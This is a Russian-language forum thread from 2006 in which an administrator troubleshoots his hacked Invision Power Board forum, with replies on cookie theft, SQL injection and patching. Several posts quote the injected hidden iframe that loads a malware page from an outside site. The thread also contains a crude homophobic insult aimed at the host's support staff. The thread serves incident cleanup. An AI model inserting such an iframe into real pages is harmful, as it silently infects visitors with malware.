Velomax Опубликовано 15 Июля 2006 Жалоба Поделиться Опубликовано 15 Июля 2006 Каким-то образом поломали форум www.velomax.lviv.ua/forum (IPB v1.3.1 final) При попытке зайти антивирус даёт сообщение о наличии трояна, затем експлорер выдает сообщение об ошибке и захлопывается.В код вставлена строчка с перенаправлением на некую вредоносную страничку.Изменено содержание файла conf_global.php у хостера - исправлен е-мейл администратора (возможно и ещё что-то).Изменен пароль администратора. Суппорт хостера отмалчивается и не берёт трубку. Вот, что я спрашивал у хостера:1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?2) если поставить бэкап, то вернется ли все на свои места?Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.Вот эти вот кросавчеги: http://hostpro.com.ua Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ServerSeek Опубликовано 15 Июля 2006 Жалоба Поделиться Опубликовано 15 Июля 2006 Вот, что я спрашивал у хостера:1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?2) если поставить бэкап, то вернется ли все на свои места?Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.Вот эти вот кросавчеги: http://hostpro.com.uaзнаком с хостером этим неплохо, вроди неплохие ребята, странно что тех. поддержка так себя ведет в таких ситуациях ведь при взломе сайта/форума и их сервер под угрозой Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь может Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 15 Июля 2006 Автор Жалоба Поделиться Опубликовано 15 Июля 2006 Очень плохо себя ведет их поддержка.Первый кросавчег стал уверять меня, что с форумом все нормально. Это не удивительно - я звонил туда в пятницу, в конце дня Со вторым кросавчегом мы проговорили по межгороду минут сорок - в трубку было слышно, как он деловито щелкал по клавишам - искал бэкап. (Это было уже на другой день.) Пока его не нашли.По-моему так, как они себя ведут, поступают только представители пассивной части сексуальных меньшинств... Хотел бы услышать какие-то более конкретные предложения. Общих фраз и завуалированных намеков на хитрые способы не надо. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 PALADIN+ Опубликовано 15 Июля 2006 Жалоба Поделиться Опубликовано 15 Июля 2006 Насчёт пасса к ФТП - попроси логи кто когда с какого ip был.Насчёт уязвимостей - вроде бы где-то здесь заплатки были.. поставь.А новые для нашей старенькой 1.3 хацкерам уже трудней найти =) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Гость Salavat Опубликовано 15 Июля 2006 Жалоба Поделиться Опубликовано 15 Июля 2006 может в хтмл шаблоне код ... точнее скорее всего ... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 15 Июля 2006 Автор Жалоба Поделиться Опубликовано 15 Июля 2006 Искал, еще позавчера искал, куда эту вредоносную строчку прописали - так и не нашел. Удивлялся.Заплатки в версии 1.3.1 все установлены сразу - я так считал. Или я ошибаюсь ? И главное - не могу определить причину: каким образом произошел взлом - дырка в движке или посторонние завладели паролем ? Вот фрагмент кода:<!--TEMPLATE: skin_boards, Template Part: PageTop--> <div align='left' style='text-align:left;padding-bottom:4px'> <!-- IBF.NEWSLINK -->Крайній раз Ви тут були сьогодні, у 00:55 </div> <iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: CatHeader_Expanded--> <div class="tableborder"> <div class='maintitle' align='left'><img src='style_images/1/nav_m.gif' border='0' alt='>' width='8' height='8' /> <a href="http://velomax.lviv.ua/forum/index.php?c=1">Поїзденьки</a></div> <table width="100%" border="0" cellspacing="1" cellpadding="4"> <tr> <th align="center" width="2%" class='titlemedium'><img src="style_images/1/spacer.gif" alt="" width="28" height="1" /></th> <th align="left" width="59%" class='titlemedium'>Форум</th> <th align="center" width="7%" class='titlemedium'>Тем</th> <th align="center" width="7%" class='titlemedium'>Відповідей</th> <th align="left" width="25%" class='titlemedium'>Поновлення</th> </tr> <iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: ForumRow--> <tr> В пятой строчке вписан какой-то левак. Каким образом - не могу понять. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Song Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь можетбред. Раниие версии ещё и позащищённей будут. Заплатки в версии 1.3.1 все установлены сразу - я так считал. ну считай так дальше. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 До сих пор вирус на месте, хотя техподдержка сказала, что они восстановили бэкап. Как втулили строчку:<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ? Я смотрел содержимое skin_boards.php - там чисто. Кроме того, когда я заходил по ФТП, было видно по дате изменения, что недавно менялся только файл conf_global.php, а все остальные файлы были не тронуты.Это значит, что вредную строчку записали в какую-то таблицу базы данных? Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала. Пароли менялись раз в квартал, были длинными и состояли из каких-то случайных букв-цифр в разных регистрах. В инет я заходил только с одной машины из дому. В прошлом месяце всего два раза заходил с работы, но ставил птичку, что захожу с чужой машины. Разве что там стоял кейлоггер?Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Jax Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 Как втулили строчку:<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ?Да какая разница как. Тем более откуда мы знаем, как тебе ее засунули Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала.Если она мала, как же тебя сломали? Ставь все, что стоит написано здесь http://www.sysman.ru/index.php?showforum=108 и надеюсь, больше у тебя такое не повторится. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Конечно есть разница. Если знать, как эту строчку вписали, то можно догадаться, откуда её убирать. Я не догадался пока, а она там сидит и всё портит.Кроме того, ставить исправления надо на чистый форум, а не на зараженый.А вопрос с кражей пароля или с дырой в коде очень важный, потому что надо определиться, как же все-таки это произошло. Все эти вопросы надо бы задавать хостеру, но он толком не может ничего сказать. Поэтому спрашиваю здесь. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ServerSeek Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 бред. Раниие версии ещё и позащищённей будут.вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Garret Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 Элементарно поставив доп защиту .htaccess на админку можно всего этого избежать. У тебя могли свистнуть куки и все... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Каким образом? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ServerSeek Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 Каким образом?в журнале "хакер" описывается один способ, через жалобу тебе посылается спец код если отвечаешь то куки оказываются у хакера Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Garret Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 Через мелкие дыры в форуме, с помощью js. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ServerSeek Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 разочаровался в этом хостинге, а вашу проблему может помочь исправить переход на платную версию и апргейд форума до последней версии Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 .silent Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 предупреждать надо что по ссылке дают вирус. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Jax Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 (изменено) вроди везде только и слышно что начальные версии взламываются,Где? Ломают только у тех, кто не может поставить элементарно простые заплатки и руки растут из общеизвестного места. Мой форум с 2003 года ломали только 2 раза, 1-й раз был через еще тогда неизвестную дырку, второй - не скажу как Больше никто ничего сделать не смог. По этому нужно с умом подходить к делу этому, если проект серьезный. Изменено 16 Июля 2006 пользователем Jax Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Я предупреждал об этом в первом постинге.Поскольку возможность кражи пароля в явном виде очень мала, посоветовавшись с группой товарищей, пока что сошлись на предположении, что каким-то образом украли куки.Затем посторонними была проведена мультимодерация.В базе данных оказались повреждены таблицы velomax_templates и velomax_skin_templates в 17 местах.Исправлено ручками, сейчас все работает.В данный момент восстанавливаем доступ и ставим заплатки с форума Сонга.Jax, напиши пожалуйста в приват про второй случай. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 PALADIN+ Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново.lol В БД через поиск найди этот<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> да сотри.Ставь заплатки, забей на бек-ап. Форум то цел, как я понимаю. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Так и было сделано. Просто я не сразу догадался об этом, дело в том, что у меня немного другая специальность. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Song Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 >> Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ? Прочитай правила раздела там где исправления. Там есть ответ на твой вопрос. >> вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда От кого ты слышал?Давай ссылки, явки, пароли На самом деле это бред, это я тебе говорю как разработчик.А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда лучше жевать.."Понятно, что без заплаток они не защищённые, так это правило распространяется хоть на 1.2 хоть на 2.1.6все они без заплаток незащищённые.Только разница в том, что в в 1.х там уже поле исчерпано для их поиска, а в 2.х с учётом того, что появился вагон нового кода вероятность найти новую уязвимость - очень большая.Доказательством тому текущий слойт, который закрыли вот только что, 2 дня назад. Каким образом?Любой новой уязвимостью, которая появилась после выхода 1.3.1Их достаточно много было. Это SQL-inj.А уж про XSS, через которую у тебя могли утащить куки снифером, я уж вообще молчу, это вообще стандартная для взломов ситуация. P.S. Почему-то все понаставят форумов и думают, что теперь они боги и их всё обойдёт стороной и программа их спасёт.РАБОТАТЬ надо, работать, чтобы дело всегда приносило доход и удовольствие. Вот так. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Velomax Опубликовано 16 Июля 2006 Автор Жалоба Поделиться Опубликовано 16 Июля 2006 Ознакомился со списком заплаток, переписал всё, проверил код форума. Оказалось, что часть исправлений уже была внесена, но половину примерно пришлось сделать. (Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитывать )Когда я "понаставил" этот форум, тут было описано всего три его уязвимости и все они были у меня закрыты.Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список. И еще: можно как-то доступно рассказать про ХСС и SQL-inj, чтобы избежать подобных сбоев в дальнейшем?Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ServerSeek Опубликовано 16 Июля 2006 Жалоба Поделиться Опубликовано 16 Июля 2006 От кого ты слышал?Давай ссылки, явки, пароли На самом деле это бред, это я тебе говорю как разработчик.А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда лучше жевать.."просто у нас год назад взломавали форум, нам советовали переходить на последнюю версию что помогло бы избежать взломов, про заплатки почему-то и речи не ишло, вот от тудава и слышал, ну и просто по логике думал что для того и усовершенствуют форум чтобы покупали и переходили на последнюю версию дабы избежать взломов, даже не мог и представить что разработчики будут убеждать клиентов что это полный бред, однако нам переход на платную последнюю версию помог избежать дальнейших взломов, что повторно убедило меня в том что последние версии защищены, но спасибо что вразумили бегу срочно за заплатками. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Song Опубликовано 17 Июля 2006 Жалоба Поделиться Опубликовано 17 Июля 2006 >> Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитыватьну вот видишь как я его к месту написал >> Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить? Вполне возможно это один из них.Понаблюдай кто из них отличается к тебе особенной ненавистью. >> Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список.Можешь просто подписаться на раздел. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
Velomax
Каким-то образом поломали форум www.velomax.lviv.ua/forum (IPB v1.3.1 final)
При попытке зайти антивирус даёт сообщение о наличии трояна, затем експлорер выдает сообщение об ошибке и захлопывается.
В код вставлена строчка с перенаправлением на некую вредоносную страничку.
Изменено содержание файла conf_global.php у хостера - исправлен е-мейл администратора (возможно и ещё что-то).
Изменен пароль администратора.
Суппорт хостера отмалчивается и не берёт трубку.
Вот, что я спрашивал у хостера:
1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?
2) если поставить бэкап, то вернется ли все на свои места?
Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.
Вот эти вот кросавчеги:
http://hostpro.com.ua
Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.
Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.
Ссылка на комментарий
Поделиться на других сайтах
25 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.